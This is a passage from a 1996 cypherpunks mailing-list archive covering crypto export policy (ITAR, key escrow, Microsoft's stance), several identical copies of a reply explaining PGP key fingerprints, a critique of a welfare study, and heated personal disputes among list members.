people into buying Clipper.  Fortunately, we didn't buy it.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 4 Dec 1996 15:38:10 -0800 (PST)
To: louis.freeh@fbi.gov
Subject: Suggestion for "the serious encryption customers" to end ITAR battle
Message-ID: <199612042337.PAA11363@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


I think we can all agree that the level of confidence in software-only
approaches to security is clearly lower than combination software plus
hardware approaches.

It is clear that what is available over the Internet is software.  (It
is much harder to distribute "hardware" as you can only really
distribute design information.  The closest analogy could be a FPGA
program, a Verilog description or some other ASIC net list.)

How about the following as an approach to resolving the dispute over
encryption exports:

1.  Allow arbitrary exports of software-only encryption.

    This means that PGP is exportable as is DES crypt libraries.

2.  Restrict exports of hardware-only or hardware/software encryption.

    This means that smart cards, HP's crypto policy cards, crypto
    processors with tamper-resistant casing, etc ... are restricted.

Why does this make sense?

1.  Reality check on export control of software:

    Software is just too transportable to be restricted, no matter
    WHAT the software does.  Any restriction on WHERE software may be
    or may go is just not feasible, and it's not going to get any
    easier in the foreseeable future.

2.  Take John Deutch at his word:

    Deutch has claimed that "serious users of cryptography" would not
    trust software downloaded over the Internet.  We clearly do not
    agree with him on this aspect, but if he truly believes it (and is
    not just making PR spin statements for the NSA), then he must
    believe that allowing software exports will not significantly
    increase the user base (and therefore, harm CIA's or NSA's
    intelligence capabilities), but it will shut up the software
    companies' complaints.

3.  Give the NSA what it wants:

    Software tends to standardize.  Encryption is only a small part of
    the chain of security measures.  Other weaknesses are surely part
    of the NSA's target for intercepts (no self-respecting
    codebreaking agency should stick to exploiting only one class of
    failures; if it is, we should question the value we are getting
    out of the billions of dollars we blindly give to the NSA).  If
    the NSA stops whining about what is too hard to break, then
    protocol weakness and other non-encryption problems could easily
    creep into standards, and the NSA would surely have an analytical
    advantage over anyone else.

    Since the NSA is happily bragging that it does not even need to
    crack the code to break in, it should be able to live with
    hardware-only export restriction.  The fact that the NSA is no
    longer drawing any lines anywhere for software will leave the bad
    guys guessing as to what it can really decode.

    In addition, hardware manufacturers will probably have a tougher
    overturning export restrictions on hardware-enhanced solutions
    after that because software companies will probably not care.  It
    is clear that the NSA only trusts hardware implementations, as it
    required Clipper to be manufactured in tamper-resistant cases.

All constructive replies welcome.

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 4 Dec 1996 15:55:58 -0800 (PST)
To: Dave Hayes <dave@kachina.jetcafe.org>
Subject: Re: The Rise and Fall of Cypherpunks WAS [Re: the Dennings]
In-Reply-To: <199612042041.MAA19687@kachina.jetcafe.org>
Message-ID: <Pine.SUN.3.91.961204154447.29195C-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 4 Dec 1996, Dave Hayes wrote:

> Why didn't you be honest and just say "I don't understand this,
> please explain"?

Dave is assuming facts not in evidence.  His meaning was 
transparently obvious.  My comment was merely the /reducto ad
absurdum/ of his statement.  Dave's "insight" is not profound,
merely shallow and specious.  Sort of like "Deep Thoughts" on
Saturday Night Live--"Without night, there can be no day."
(Whoa man, that's SO heavy!)


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott J. Schryvers" <schryver@radiks.net>
Date: Wed, 4 Dec 1996 14:09:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Just call the police"...yeah, right
Message-ID: <199612042200.QAA27118@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>The name of the informal logical fallacy Tim May has *not*
>made is 'argumentum ad hominem' (literally, 'an argument 
>to the man'; attacking one's opponent rather than dealing
>with the subject under discussion; aka name calling).
>
>Having said that, while Tim May has not committed a logical
>fallacy, neither has he advanced a logical argument.  He
>has merely stated his conclusory opinion of the other
>person's comment.  By itself, it adds little or nothing of 
>substance to the argument.
>
>Logos out
>
Uh logos... Deal with it.  If I needed some one to walk me through a mailing 
list when it concerns constructive arguements I'd be requesting a moderated
list and since I find moderated news groups to be nonproductive affairs I tend
to find this mailing list perfect for my needs.  As for judging if Tim has 
advanced the arguement or not that is for each person to decide not you.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqXvk/+hzPlzwZAdAQF5Lgf/e3/99SUkd9aADGeS8UjYYcSxTuH8LxE5
AdvIRgLmv11BdTgcyK+q03MYV1gGjmZmtWtEuCiPN/O39gtMM4RYcz2/c5f7bMMA
h8QwKP9h4RNA1dWgDDF54PQuKElMr9SBJJwLdyYwPddkjjVEs0tjFRoJv2MsEkmB
nK3REFH75U6F7q0NZB8IHxBbYNDYbTejRcx5yfP+W1lg2cLK2lonis/G4X6Kj7gu
BdNLn3PLS6qr1YgTB1gWQD5JzCN6FJ7Gw0snjALLFbG0QbiMLJd7TT/bWc8ExDoo
HUg+U4OKZ/oPLzNMiZqvzn9gMjGKWz0+hQbi8kR1f8OT/5+bJ4CFjw==
=xM3k
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@c2.net
Date: Wed, 4 Dec 1996 16:24:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Confirmation for subscribe cryptography
Message-ID: <199612050022.QAA22242@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


--

Someone (possibly you) has requested that your email address be added
to or deleted from the mailing list "cryptography@c2.net".

If you really want this action to be taken, please send the following
commands (exactly as shown) back to "Majordomo@c2.net":

	auth 727e8b91 subscribe cryptography cypherpunks@toad.com

If you do not want to this action taken, just ignore this message and
no action will be taken.

If you have any questions about the policy of the list owner, please
contact "cryptography-approval@c2.net".

Thanks!

Majordomo@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Dec 1996 16:50:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Politeness
In-Reply-To: <Pine.BSF.3.91.961204070229.25120B-100000@blacklodge.c2.net>
Message-ID: <g1LFyD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


logos <logos@c2.net> writes:
>      I have been unfailingly polite to you. Do you have it
> within your character to respond to me in kind?

Do you think spelling my last name "Vilus" is polite?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Wed, 4 Dec 1996 13:54:23 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Re: AOL
Message-ID: <199612042158.QAA01672@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


> yes.... they did knock off that $3.00 an hour thing. now.. $20.00
unlimited..
> I'd hate to do an AOL spam to the list.. but someone asked.. and for all
you
> that say 'get a real internet provider'. Well.. I get ALL the same access
> most of you do. No shell account...But I can telnet from AOL to one. So
> there. Nah nah nah =}
	Hehe. Then you'll like this: http://www.geocities.com/TimesSquare/6660




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Wed, 4 Dec 1996 17:09:05 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: [crypto] Avatar Protection?
Message-ID: <9612050108.AA07734@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


A graphic-designer friend of mine and I were talking
about VRML avatars, and custom design work, and
could he offer a service designing them etc...

His worry is that since everyone in the same virtual
environment as his customer would see the designer 
avatar, wouldn't they also be able to easily rip off
his work?  (or his customer's property, take your pick.)

I wasn't sure...it seems to me that I read something vaguely
along these lines for a cryptography protocol of some sort..
The problem is this:  Is there a way for a user to "view" the client's
avatar (and in this sense, the user usually has to receive a copy 
of the code to render the avatar and render it on the local machine)
but not save a copy?  Assume that a client with no save feature
is not a viable option...too easy to work around.

I suppose an analogy would be: Is there a way for a person to
see the plaintext, but not record it?  I think that question really
answers itself - no.  How about alternatives?  If the server
of the environment only renders "views" (say, certain angles, or
a bitmap) of the avatar, rather than sending the description file?

Any other thoughts?

    Ryan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lurker" <lurker@mail.tcbi.com>
Date: Wed, 4 Dec 1996 15:22:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <3.0.32.19961204173115.006924ac@mail.tcbi.com>
MIME-Version: 1.0
Content-Type: text/plain


Could someone tell me where I can find a text file of *all* usenet newsgroups?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 4 Dec 1996 17:33:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Suggestion for "the serious encryption customers" to end ITARbattle
In-Reply-To: <199612042337.PAA11363@ohio.chromatic.com>
Message-ID: <v03007800aecbd4fb37e2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:37 PM -0800 12/4/96, Ernest Hua wrote:
>I think we can all agree that the level of confidence in software-only
>approaches to security is clearly lower than combination software plus
>hardware approaches.
>
>It is clear that what is available over the Internet is software.  (It
>is much harder to distribute "hardware" as you can only really
>distribute design information.  The closest analogy could be a FPGA
>program, a Verilog description or some other ASIC net list.)

But of course this is a distinction without a difference, at least for all
but 0.00073% of Internet users. That is, downloading a Verilog or whatever
description would be no more "verifiable to the user" than a software-only
program. In fact, the hardware description _is_ just another program!


>How about the following as an approach to resolving the dispute over
>encryption exports:
>
>1.  Allow arbitrary exports of software-only encryption.

The government will of course not be fooled by this. Whether one accepts my
point that hardware = software (effectively), the government has heretofore
seen software as an important issue.

In fact, I will take issue with my distinguished colleague (are you
satisfied, Logos?) Ernest Hua's point that only hardware provides real
security. To whit, for several years we on the Cypherpunks list have
advocated this strategy:

-- standardized hardware, such as PCs and Soundlaster cards

-- community-checkable software, such as PGP

This combination is preferable to "black boxes" which the average user
cannot verify (not that the average user can verify, say, PGP, but digital
signatures means the average user can more effectively "trust" the
consensus of those who _have_ looked at, say, PGP 2.6ui, and have vouched
for it.

(This debate came up several times when people proposed specialized
hardware, which would be a) hard to verify, b) hard to distribute widely,
and c) something very few people would casually try. Regardless of our
arguments--though perhaps confirming them--there have been no commonly used
hardware widgets or cards used by any significant number of us.)

>2.  Take John Deutch at his word:
>
>    Deutch has claimed that "serious users of cryptography" would not
>    trust software downloaded over the Internet.  We clearly do not
>    agree with him on this aspect, but if he truly believes it (and is
>    not just making PR spin statements for the NSA), then he must
>    believe that allowing software exports will not significantly
>    increase the user base (and therefore, harm CIA's or NSA's
>    intelligence capabilities), but it will shut up the software
>    companies' complaints.

I don't think he believes this. Think: FUD. There is no evidence that
properly authenticated PGP is "weak." And if it were, John Deutch would be
a fool to cast doubt on it. I think they're terrified as hell about
software-only approaches running on widely-available hardware and would
like nothing more than to see hardware-only approaches mandated (as this
would provide slightly more control over exports and distibution). Not that
this'll happen, of course.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tom Albertson (LCA)" <tomalb@microsoft.com>
Date: Wed, 4 Dec 1996 18:47:09 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Microsoft & Key Escrow
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961205024640Z-2637@INET-04-IMC.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


These issues are also addressed at somewhat greater length than in the
FAQ in "Microsoft Policy on Export Controls on Encryption" at
http://www.microsoft.com/intdev/security/export/expcont1.htm (updated
since the recent Administration announcements).

rgds
tom
>-----Original Message-----
>From:	Blake Coverett [SMTP:blake@bcdev.com]
>Sent:	Wednesday, December 04, 1996 6:12 PM
>To:	'cypherpunks@toad.com'
>Subject:	Microsoft & Key Escrow
>
>Following are some of the relevent snippets from
>http://www.microsoft.com/intdev/security/export/exporfaq-f.htm.
>The comments in square brackets are mine.
>
>---cut here---
>What is Microsoft's position on supporting key escrow?
>
>Key escrow encryption is not a market-driven solution and it raises serious
>privacy concerns for many customers. It is also new, undeveloped, untested,
>and uncosted, and it will take a long time to be worked out. Additionally,
>customers have expressed hesitation about mandatory key escrow, especially if
>they have to give the keys to the government or a government-selected third
>party. Therefore, we are not actively adding support for key escrow in our
>products and technologies. 
>
>[About as good as we can ask for.  I would, however, like that last sentence
> better if the word 'actively' was missing.]
>
>Shouldn't the U.S. government be able to access information that could
>prevent terrorist acts and crime?
>
>Strong non-key escrow encryption is already available from retail outlets,
>foreign companies, and off the Internet. Thus the U.S. government is already
>having--and will continue to have--a harder time in the future accessing
>plain text regardless of U.S. export restrictions. 
>
>[I suppose it would be too much to expect a third sentence
> reading.  'This is a good thing.']
>
>What is key recovery? How does it relate to key escrow?
>
>Market-driven data recovery refers to a product feature that allows users to
>maintain a spare private encryption key in a safe place. Generally, a data
>recovery system escrows a copy of the session key with the message or file
>and the user (or perhaps his employer) controls the decision whether to
>utilize this feature. With key escrow the U.S. government holds or has access
>to a user's private encryption key. 
>
>It is not yet clear whether such systems are exportable. In the October 1
>announcement, the U.S. government referred to "key recovery" without defining
>it; in all likelihood, however, they still have in mind government key
>escrow, and not market-driven data recovery. 
>
>[Hmm... it's just possible that Microsoft's spin doctors are
> better than those of the US government.  Perhaps they can
> sell the world on their definition of 'key recovery' instead of
> the one we know the TLAs intended.]
>---cut here---
>
>regards,
>-Blake
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 6 Dec 1996 07:34:01 -0800 (PST)
To: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Subject: Re: What's a "fingerprint" ?
Message-ID: <849884579.522761.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Speaking about PGP.. Guys...
> Whats fingerprint is need for ? And how to create it ?

A key fingerprint is a unique identifier for an individual PGP key, 
it is used for verifying that a recieved key is authentic before 
signing it, to generate a PGP key fingerprint use pgp -kvc <username>


 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 6 Dec 1996 07:12:47 -0800 (PST)
To: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Subject: Re: What's a "fingerprint" ?
Message-ID: <849884578.522759.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Speaking about PGP.. Guys...
> Whats fingerprint is need for ? And how to create it ?

A key fingerprint is a unique identifier for an individual PGP key, 
it is used for verifying that a recieved key is authentic before 
signing it, to generate a PGP key fingerprint use pgp -kvc <username>


 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Wed, 4 Dec 1996 18:58:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Chippen@Dale
Message-ID: <199612050252.SAA00466@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 07:37 AM 12/4/96 -0800, Dale Thorn wrote:
:
:If you, Sandy, and the other offenders *really* want to keep the noise
:down, then next time ask John directly for a reply, and if none is
:forthcoming, say to the list *once*, "John will not answer up", etc.,
:and let the subscribers draw their own conclusions from the silence,
:instead of from your inane "defenses".
:
Dale,

John has no obligation to say anything. In all fairness, no conclusions should be drawn based on any individual's saying nothing. Such thinking is from the Dark Ages.

Lighten up, and let go of it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: logos <logos@c2.net>
Date: Wed, 4 Dec 1996 18:55:38 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: Politeness
Message-ID: <Pine.BSF.3.91.961204184017.5363G-100000@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


Dimitri Vulis wrote:

>logos <logos@c2.net> writes:
>>      I have been unfailingly polite to you. Do you have it
>> within your character to respond to me in kind?

>Do you think spelling my last name "Vilus" is polite?

     I think it was neither polite nor impolite. It was
a innocent transposition error.
     Correcting the error and apologizing were polite,
however. Do you disagree?  
     I have already raised the question of your apparent
lack of intellectual honesty in that you seem to not apply 
the same rules of conduct on yourself as you would on 
others. In English there is the saying, 'what is sauce for 
the goose, is sauce for the gander'. I note that you have 
spelt my name as 'logos'. As it is a proper noun in the 
usage and I have spelt it with the 'L', I would ask you if 
you consider this spelling of my name to be polite?
 
Logos out




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 6 Dec 1996 07:54:34 -0800 (PST)
To: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Subject: Re: What's a "fingerprint" ?
Message-ID: <849884579.522766.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Speaking about PGP.. Guys...
> Whats fingerprint is need for ? And how to create it ?

A key fingerprint is a unique identifier for an individual PGP key, 
it is used for verifying that a recieved key is authentic before 
signing it, to generate a PGP key fingerprint use pgp -kvc <username>


 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 6 Dec 1996 07:38:20 -0800 (PST)
To: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Subject: Re: What's a "fingerprint" ?
Message-ID: <849884582.522786.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Speaking about PGP.. Guys...
> Whats fingerprint is need for ? And how to create it ?

A key fingerprint is a unique identifier for an individual PGP key, 
it is used for verifying that a recieved key is authentic before 
signing it, to generate a PGP key fingerprint use pgp -kvc <username>


 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 6 Dec 1996 08:34:34 -0800 (PST)
To: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Subject: Re: What's a "fingerprint" ?
Message-ID: <849884583.522793.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Speaking about PGP.. Guys...
> Whats fingerprint is need for ? And how to create it ?

A key fingerprint is a unique identifier for an individual PGP key, 
it is used for verifying that a recieved key is authentic before 
signing it, to generate a PGP key fingerprint use pgp -kvc <username>


 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 6 Dec 1996 07:46:21 -0800 (PST)
To: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Subject: Re: What's a "fingerprint" ?
Message-ID: <849884583.522794.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Speaking about PGP.. Guys...
> Whats fingerprint is need for ? And how to create it ?

A key fingerprint is a unique identifier for an individual PGP key, 
it is used for verifying that a recieved key is authentic before 
signing it, to generate a PGP key fingerprint use pgp -kvc <username>


 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jose Luis Delgado <jdelgado@nexus.net.mx>
Date: Wed, 4 Dec 1996 17:17:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <Pine.SOL.3.91.961204192248.18981A-100000@nexus.net.mx>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe cypherpunks






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brent Cunningham <bcungham@entrust.com>
Date: Wed, 4 Dec 1996 16:34:29 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: Why Cryptography is harder than it looks?
Message-ID: <c=CA%a=_%p=NorTel_Secure_Ne%l=GRANNY-961205002900Z-1947@bwdldb.ott.bnr.ca>
MIME-Version: 1.0
Content-Type: text/plain


Can you please either:  1) email me a copy; or 2) give me a pointer as
to where I can get a copy; of Bruce Schneier's paper on "Why
Cryptography is harder than it looks?"

Much appreciated.

- Brent

Check out the Network Computing review of Entrust:  www.nwc.com

Brent Cunningham
Nortel Secure Networks
Post Office Box 190
Ramona, California 92065
Tel:  619 788-7676
Fax:  619 788-9696
Email:  bc1@entrust.com
www.nortel.com/entrust




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Felix Lee <flee@teleport.com>
Date: Wed, 4 Dec 1996 19:32:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Culling the proles with crypto anarchy
In-Reply-To: <2.2.32.19961203024102.008bd390@netcom.com>
Message-ID: <199612050332.TAA20993@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


> "The Work Welfare Trade-Off: An Analysis of the Total Level of Welfare
> Benefits by the State" by Michael Tanner, Stephen Moore, and David Hartman,
> September, 1995.  It's at <http://www.cato.org/research/pr-nd-st.html>.  

actual report is at http://www.cato.org/pubs/pas/pa-240.html

offhand, I don't have a basis for grokking the numbers,
because I've never been an unwed mother with two children
under 5yrs old.  if they had done numbers for a single male
with no children, I'd have a better chance of knowing how
attractive welfare would be over random lowpaying jobs I
used to have.

I find it very odd that the study does an elaborate benefits
calculation for a mother without a job, but doesn't do a
similar calculation for a mother with an entry-level job.
this would be a directly meaningful comparison.

instead, it tries to convert welfare benefits to "pretax
wage equivalent", which is just silly.  people with a pretax
income of $30k/yr probably have a health plan paid for by
their employer, which invalidates the comparison being made.

something else that's iffy is inclusion of median housing
assistance paid out by agencies, rather than median received
by the sample population.  this means the model individual
is a nonworking unwed mother of two infants who gets housing
assistance, rather than just any nonworking unwed mother of
two infants on welfare.

report rejected:
  meaningless numbers
  thesis not supported by the evidence
--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 4 Dec 1996 20:07:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Silence is not assent (re the Vulis nonsense)
In-Reply-To: <c=US%a=_%p=msft%l=RED-81-MSG-961204214721Z-812@INET-03-IMC.itg.microsoft.com>
Message-ID: <32A6498D.6010@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Blanc Weber wrote:
> From:   Dale Thorn (in reply to Tim May)
> If you, Sandy, and the other offenders *really* want to keep the noise
> down, then next time ask John directly for a reply, and if none is
> forthcoming, say to the list *once*, "John will not answer up", etc.,
> and let the subscribers draw their own conclusions from the silence,
> instead of from your inane "defenses".

> As for myself, I was not speaking for Gilmore nor defending him when I
> added my reply to the discussion.   I brought up an item which others
> had overlooked (the fact that Vulis had challenged John to censor him)
> as specific reference to include in their judgement of his actions, as
> well as illustrating how Vulis had invested a lot of effort in
> motivating someone into just such a response.

[snip]

Thanks for a curteous reply.  I believe that my idea above is still a
great idea (if the subscribers are not afraid of confrontation), as it
would tend to force the issue more into the open.

You mention what "others had overlooked".  How about this: Tim May sent
a message the other day stating (in essence) that the whole "censorship"
thing was pretty much a size (rather than content) problem.  I posted
that notion twice, and there has been *no* discussion of it, as far as
I know.  Too bad Tim didn't post that at the beginning of the affair,
since everyone apparently reads *his* mail.

> So I (and others as well) were addressing the *ideas* of censorship &
> the actions of private property owners, arguing in regard of a more
> precise & correct understanding of the principles involved,  as
> exemplified by John's actions  -  but not in place of his own
> "self-defense" of them.

Can I speculate here?  The nature of the list, as pertains to messaging,
is fairly quick response for most postings.  I'm sure you realize that
that raises the emotional content quite a bit, as would be lessened if
people typed out their responses and then sat on them (and reviewed them)
for a day or so before re-posting. I have no problem with *any* discussion
that any subscriber feels necessary, but frankly, when I add it all up,
the pro-Gilmore faction went way overboard restating ad nauseam to the
effect that "John can do whatever he wants, and y'all can take a hike".

> Frankly, most of the long-time members of the list would not need any
> such statements of defense from John in order to appreciate the nature
> of the circumstance and the reasoning for his symbolic 'censorship'.

I apologize in advance for this one, but I honestly think that statement
says more about acceptance of the Iron Boot principle than it says about
what really happened.  I for one am not an insider in any of the various
cliques that surround this list, so perhaps I missed something that would
explain it better to me.  I suppose you are referring to an unspoken
understanding, but again, and for future reference, you might want to
consider the non-long-time members and speak the unspoken, as it were.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: logos <logos@c2.net>
Date: Wed, 4 Dec 1996 20:37:06 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: for future reference
Message-ID: <Pine.BSF.3.91.961204203447.9088A-100000@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzKk8w8AAAEEANQEG7EoV5nsodaoASR7tW0kMp438idFKQRH768R9QLkHpuK
Ec3VI1DbTivF8W9UpVdTyLbXMf3rVysVEOnVeRKlyZV4m+qMneCc4GBUJhDoJ/Ic
jEAnaoM7V7KHoGLzpQGDWOG633TcBIjURVmyr9pIYIGMXnpxvpZRaIBMOSlxAAUR
tBRMb2dvcyA8bG9nb3NAYzIubmV0Pg==
=PRk1
-----END PGP PUBLIC KEY BLOCK-----

Logos out




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Dec 1996 19:41:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Intellectual dishonesty
In-Reply-To: <Pine.BSF.3.91.961203224626.10240A-100000@blacklodge.c2.net>
Message-ID: <P6XFyD75w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


OK - logos claims that he misspelled my name by accient.
Let's give him one more chance.

logos <logos@c2.net> writes:

> Dr.Dimitri Vulis KOTM <dlv@bwalk.dm.com> wrote:
>
> > LOGOS <logos@c2.net> writes:
> >
> > > Sovereign collegues,
> >
> > You already sound like a jerk.
>
>      Perhaps you should suspend judgment until you have the
> opportunity to evaluate the content of my posts.  What are
> you antagonistic to the use of honorifics?

Because reading fantasyland jargon (like 'Toad Hall') wastes my time.

> > >      I am Logos. I have adopted this pseudonym to conceal my
> > > 'true name'. I want the ideas which I shall be espousing
> > > to stand or fall on their own merits and not on the basis
> > > of biases that my name, sex, ethnicity, etc. might otherwise
> >
> > sexual preferences...
>
>      Yes, that and other catagorizations which are
> irrelevant to the primary focus of this list.

It's funny that you should say this, since Tim May and other prominent
"cypher punks" devote so much attention to their "enemies'" ethnicity and
religion. Recall the attacks on "crazy Russians", "immigrants who abuse
American freedoms", the recent attack on Hispanics, the attacks on Jews,
the attacks on Mormons...

> > That's right. You lack the decorum to spell either my
> > first name or my last name correctly.
>
>      'Decorum' has to do with polite behaviour.  While I
> was certainly remiss in my hasty spelling of your name, it
> was not intentional, therefore not a lack of decorum. I
> do apologize for my negligence. I shall endeavor to spell
> you name correctly in the future.

I find it hard to believe that one misspells "Vulis" as "Vilus"
unintentionally, but I'll give you another chance...

> > "Cypher punks" are a gang of uncouth juveniles
>
>      I'm not sure I understand the relevance of this
> comment. Was it made in response to my error in spelling?

Oops! I accidentally deleted a big chunk of my own article before
sending it out. Sorry. I'll see if I can find it.

> In any case, it is a good example of the informal logical
> fallacy of 'over generalization'. As I understand it, there
> are circa 1000 people subscribed to Cypherpunks.  To paint
> an entire group with such a characterization is both
> illogical and unfair. I also question your use of the

What about painting entire ethnic or religion groups, as Timmy May does?

> word 'uncouth'.  I have seen no posts on Cypherpunks
> that were any more 'uncultured; crude; or boorish' than
